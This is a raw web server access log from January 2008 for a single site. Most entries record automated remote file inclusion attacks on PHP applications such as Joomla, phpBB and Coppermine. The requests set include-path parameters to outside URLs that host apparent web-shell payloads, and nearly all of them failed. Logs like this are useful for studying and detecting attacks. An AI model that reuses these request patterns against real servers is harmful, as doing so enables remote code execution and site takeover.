87.230.3.98 - - [20/Jan/2008:19:08:46 -0800] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
67.19.18.66 - - [20/Jan/2008:19:10:08 -0800] "GET /logs/access_071217.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.30.226.134 - - [20/Jan/2008:19:10:47 -0800] "GET /logs/access_071008.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
195.225.199.128 - - [20/Jan/2008:19:11:10 -0800] "GET //forum.php?id=http://www.gassner-design.de/_upload/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
195.225.199.128 - - [20/Jan/2008:19:11:10 -0800] "GET /logs//forum.php?id=http://www.gassner-design.de/_upload/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
193.207.106.54 - - [20/Jan/2008:19:11:37 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.90.179.94 - - [20/Jan/2008:19:12:00 -0800] "GET /logs/access_070806.log//magazine.php?inc=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [20/Jan/2008:19:12:00 -0800] "GET /logs/access_070806.log//index2.php?inc=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
65.55.208.230 - - [20/Jan/2008:19:12:25 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.230 - - [20/Jan/2008:19:12:25 -0800] "GET /tmp/?M=D HTTP/1.0" 200 504 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
85.119.158.50 - - [20/Jan/2008:19:12:30 -0800] "GET /logs/access_071008.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
85.119.158.50 - - [20/Jan/2008:19:12:30 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
85.119.158.50 - - [20/Jan/2008:19:12:30 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
85.119.158.50 - - [20/Jan/2008:19:12:41 -0800] "GET /logs/access_071014.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:19:13:23 -0800] "GET /index1.php?x=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.120.241.242 - - [20/Jan/2008:19:14:25 -0800] "GET /logs/access_071014.log//modules/xfsection/modify.php?dir_module=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.120.241.242 - - [20/Jan/2008:19:14:25 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.120.241.242 - - [20/Jan/2008:19:14:26 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.120.241.242 - - [20/Jan/2008:19:15:16 -0800] "GET /logs/access_071203.log//modules/xfsection/modify.php?dir_module=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:19:18:52 -0800] "GET /logs/access_080107.log/homepage.php?sel=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:19:18:53 -0800] "GET /homepage.php?sel=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:19:18:53 -0800] "GET /logs/homepage.php?sel=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.55.146.215 - - [20/Jan/2008:19:20:24 -0800] "GET /logs/access_071014.log//modules/xfsection/modify.php?dir_module=http://www.catim.com/legislacao/.bht/r57.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.55.146.215 - - [20/Jan/2008:19:20:24 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.catim.com/legislacao/.bht/r57.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.55.146.215 - - [20/Jan/2008:19:21:06 -0800] "GET /logs/access_071203.log//modules/xfsection/modify.php?dir_module=http://www.catim.com/legislacao/.bht/r57.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.22.119 - - [20/Jan/2008:19:23:16 -0800] "GET /logs/access_070820.log HTTP/1.0" 200 983040 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.30.216.93 - - [20/Jan/2008:19:23:32 -0800] "GET /logs/access_071112.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
193.207.106.54 - - [20/Jan/2008:19:25:02 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.geocities.com/heru_scorpion/herucry.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.207.106.54 - - [20/Jan/2008:19:25:03 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.geocities.com/heru_scorpion/herucry.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.189.4.131 - - [20/Jan/2008:19:25:28 -0800] "GET /logs/access_071014.log/100http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.189.4.131 - - [20/Jan/2008:19:25:28 -0800] "GET /logs/100http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.173.115 - - [20/Jan/2008:19:28:09 -0800] "GET /logs/access_070820.log/index1.php?_REQUEST=&_REQUEST%5boption%5d=com_zoomt&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://onlinemarketingcenter.com/robot.txt????????????????????http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.173.115 - - [20/Jan/2008:19:28:10 -0800] "GET /index1.php?_REQUEST=&_REQUEST%5boption%5d=com_zoomt&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://onlinemarketingcenter.com/robot.txt????????????????????http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.173.115 - - [20/Jan/2008:19:28:10 -0800] "GET /logs/index1.php?_REQUEST=&_REQUEST%5boption%5d=com_zoomt&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://onlinemarketingcenter.com/robot.txt????????????????????http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.238.199.66 - - [20/Jan/2008:19:29:01 -0800] "GET /index.php?inc=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.108.67.152 - - [20/Jan/2008:19:29:35 -0800] "GET /logs/access_071014.log/components/com_joomlaboard/file_upload.php?sbp=http://pucorp.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.152 - - [20/Jan/2008:19:29:35 -0800] "GET /components/com_joomlaboard/file_upload.php?sbp=http://pucorp.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.152 - - [20/Jan/2008:19:29:36 -0800] "GET /logs/components/com_joomlaboard/file_upload.php?sbp=http://pucorp.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:19:31:36 -0800] "GET /logs/index2.php?x=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:19:31:36 -0800] "GET /index2.php?x=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.246.48.124 - - [20/Jan/2008:19:32:23 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.75.35.118 - - [20/Jan/2008:19:32:42 -0800] "GET /logs/access_071217.log//vwar/convert/mvcw.php?step=1&vwar_root=http://gagarotak.googlepages.com/oo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.35.118 - - [20/Jan/2008:19:32:42 -0800] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://gagarotak.googlepages.com/oo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.35.118 - - [20/Jan/2008:19:32:42 -0800] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://gagarotak.googlepages.com/oo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.35.118 - - [20/Jan/2008:19:33:01 -0800] "GET /logs/access_071217.log//vwar/convert/mvcw.php?step=1&vwar_root=http://gagarotak.googlepages.com/oo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.35.118 - - [20/Jan/2008:19:33:01 -0800] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://gagarotak.googlepages.com/oo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.35.118 - - [20/Jan/2008:19:33:01 -0800] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://gagarotak.googlepages.com/oo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.119.158.50 - - [20/Jan/2008:19:36:19 -0800] "GET /logs/access_071210.log/inc/header.php/step_one.php?server_inc=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
85.119.158.50 - - [20/Jan/2008:19:36:19 -0800] "GET /inc/header.php/step_one.php?server_inc=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
85.119.158.50 - - [20/Jan/2008:19:36:19 -0800] "GET /logs/inc/header.php/step_one.php?server_inc=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:19:36:50 -0800] "GET /main.php?x=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.119.158.50 - - [20/Jan/2008:19:37:01 -0800] "GET /logs/access_071217.log/inc/header.php/step_one.php?server_inc=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
89.111.173.115 - - [20/Jan/2008:19:39:57 -0800] "GET /logs/access_071008.log/index1.php?_REQUEST=&_REQUEST%5boption%5d=com_zoomt&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://onlinemarketingcenter.com/robot.txt????????????????????http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.80.28.2 - - [20/Jan/2008:19:46:33 -0800] "GET /index.php?inc=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.64.49.252 - - [20/Jan/2008:19:47:35 -0800] "GET /logs/access_071203.log/index.php?pag=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.49.252 - - [20/Jan/2008:19:47:35 -0800] "GET /index.php?pag=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.49.252 - - [20/Jan/2008:19:47:36 -0800] "GET /logs/index.php?pag=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.122.247.116 - - [20/Jan/2008:19:48:16 -0800] "GET /logs/access_071014.log/home.php?table=http://www.bes.org.tr/imgcls/testin.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
193.80.28.2 - - [20/Jan/2008:19:49:58 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.80.28.2 - - [20/Jan/2008:19:49:58 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.22.24.200 - - [20/Jan/2008:19:50:10 -0800] "GET /index.php?u=http://seucu.us/frame.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.28.220 - - [20/Jan/2008:19:50:48 -0800] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.238.199.66 - - [20/Jan/2008:19:51:15 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.66 - - [20/Jan/2008:19:51:15 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.17.3.183 - - [20/Jan/2008:19:51:46 -0800] "GET /logs/access_070820.log//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [20/Jan/2008:19:51:46 -0800] "GET //components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [20/Jan/2008:19:51:47 -0800] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [20/Jan/2008:19:51:59 -0800] "GET /logs/access_071022.log//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.246.48.124 - - [20/Jan/2008:19:52:29 -0800] "GET /logs/access_071210.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.48.124 - - [20/Jan/2008:19:52:30 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.48.124 - - [20/Jan/2008:19:52:56 -0800] "GET /logs/access_071014.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.207.106.54 - - [20/Jan/2008:19:53:21 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.99.194.216 - - [20/Jan/2008:19:54:32 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://66.206.168.162:32000/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
208.99.194.216 - - [20/Jan/2008:19:54:32 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://66.206.168.162:32000/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
69.41.238.2 - - [20/Jan/2008:19:59:09 -0800] "GET /logs/access_071014.log/index2.php?content=http://www.mta.cl/galeria2/galery2.jpg???????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.41.238.2 - - [20/Jan/2008:19:59:09 -0800] "GET /index2.php?content=http://www.mta.cl/galeria2/galery2.jpg???????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.41.238.2 - - [20/Jan/2008:19:59:09 -0800] "GET /logs/index2.php?content=http://www.mta.cl/galeria2/galery2.jpg???????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.41.238.2 - - [20/Jan/2008:19:59:12 -0800] "GET /logs/access_071014.log/index2.php?content=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.41.238.2 - - [20/Jan/2008:19:59:12 -0800] "GET /index2.php?content=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.41.238.2 - - [20/Jan/2008:19:59:12 -0800] "GET /logs/index2.php?content=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.41.238.2 - - [20/Jan/2008:19:59:29 -0800] "GET /logs/access_070826.log/index2.php?content=http://www.mta.cl/galeria2/galery2.jpg???????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.41.238.2 - - [20/Jan/2008:19:59:29 -0800] "GET /logs/access_070826.log/index2.php?content=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.207.106.54 - - [20/Jan/2008:19:59:40 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/heru_scorpion/herucry.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.207.106.54 - - [20/Jan/2008:19:59:40 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/heru_scorpion/herucry.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.41.238.2 - - [20/Jan/2008:20:04:07 -0800] "GET /logs/access_071112.log/modules/Neos_Chronos/header.php?base_folder=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.41.238.2 - - [20/Jan/2008:20:04:07 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.41.238.2 - - [20/Jan/2008:20:04:07 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.26.129.52 - - [20/Jan/2008:20:06:11 -0800] "GET /logs/index2.php?content=http://www.mta.cl/galeria2/galery2.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
200.26.129.52 - - [20/Jan/2008:20:06:12 -0800] "GET /index2.php?content=http://www.mta.cl/galeria2/galery2.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
87.238.199.66 - - [20/Jan/2008:20:06:21 -0800] "GET /logs/access_070702.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.174.62.136 - - [20/Jan/2008:20:06:40 -0800] "GET /index2.php?content=http://mobee.ru/usr/xml/c???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.238.199.66 - - [20/Jan/2008:20:06:47 -0800] "GET /logs/access_070826.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.66 - - [20/Jan/2008:20:07:08 -0800] "GET /logs/access_070826.log/index.php?inc=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.66 - - [20/Jan/2008:20:07:08 -0800] "GET /logs/index.php?inc=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.120.241.242 - - [20/Jan/2008:20:07:25 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.38.31.130 - - [20/Jan/2008:20:07:57 -0800] "GET /logs/index.php?pag=http://www.handicap.pevg.de/images/help.png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
64.38.31.130 - - [20/Jan/2008:20:07:57 -0800] "GET /index.php?pag=http://www.handicap.pevg.de/images/help.png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
69.64.49.252 - - [20/Jan/2008:20:08:17 -0800] "GET /logs/access_070820.log/index.php?pag=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.91.99.14 - - [20/Jan/2008:20:08:50 -0800] "GET /logs/access_071022.log//?mosConfig_absolute_path=http://www.bettysbluestarlounge.com/Calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.91.99.14 - - [20/Jan/2008:20:08:51 -0800] "GET //?mosConfig_absolute_path=http://www.bettysbluestarlounge.com/Calendar/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
193.91.99.14 - - [20/Jan/2008:20:08:51 -0800] "GET /logs//?mosConfig_absolute_path=http://www.bettysbluestarlounge.com/Calendar/id.txt? HTTP/1.1" 200 5624 "-" "libwww-perl/5.805" "www.galf.org"
67.18.107.20 - - [20/Jan/2008:20:08:53 -0800] "GET /index.php?pag=http://www.e-sempione.org/z.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
67.18.107.20 - - [20/Jan/2008:20:08:53 -0800] "GET /logs/index.php?pag=http://www.e-sempione.org/z.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
207.58.140.237 - - [20/Jan/2008:20:09:28 -0800] "GET /logs/access_071014.log////////////admin/spaw/spaw_control.class.php?spaw_root=http://tibaka.t35.com/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.140.237 - - [20/Jan/2008:20:09:28 -0800] "GET ////////////admin/spaw/spaw_control.class.php?spaw_root=http://tibaka.t35.com/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.140.237 - - [20/Jan/2008:20:09:28 -0800] "GET /logs////////////admin/spaw/spaw_control.class.php?spaw_root=http://tibaka.t35.com/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.249.0.39 - - [20/Jan/2008:20:09:37 -0800] "GET /index2.php?content=http://www.alfastyle.ro/red/cmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
207.249.0.39 - - [20/Jan/2008:20:09:37 -0800] "GET /logs/index2.php?content=http://www.alfastyle.ro/red/cmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
87.238.199.66 - - [20/Jan/2008:20:09:51 -0800] "GET /logs/access_071008.log/index.php?inc=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.58.140.237 - - [20/Jan/2008:20:10:29 -0800] "GET /logs/access_071112.log////////////admin/spaw/spaw_control.class.php?spaw_root=http://tibaka.t35.com/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.90.135.132 - - [20/Jan/2008:20:11:54 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.22.24.200 - - [20/Jan/2008:20:12:56 -0800] "GET /logs/access_080107.log/index.php?u=http://seucu.us/frame.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.22.24.200 - - [20/Jan/2008:20:12:56 -0800] "GET /logs/index.php?u=http://seucu.us/frame.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.120.241.242 - - [20/Jan/2008:20:13:15 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.90.135.132 - - [20/Jan/2008:20:14:11 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.119.158.50 - - [20/Jan/2008:20:15:04 -0800] "GET /logs/access_071014.log//modules/xfsection/modify.php?dir_module=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
85.119.158.50 - - [20/Jan/2008:20:15:05 -0800] "GET //modules/xfsection/modify.php?dir_module=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
85.119.158.50 - - [20/Jan/2008:20:15:05 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
85.119.158.50 - - [20/Jan/2008:20:16:14 -0800] "GET /logs/access_071203.log//modules/xfsection/modify.php?dir_module=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
72.38.10.218 - - [20/Jan/2008:20:17:23 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.94.121.40 - - [20/Jan/2008:20:20:07 -0800] "GET /logs/access_071014.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
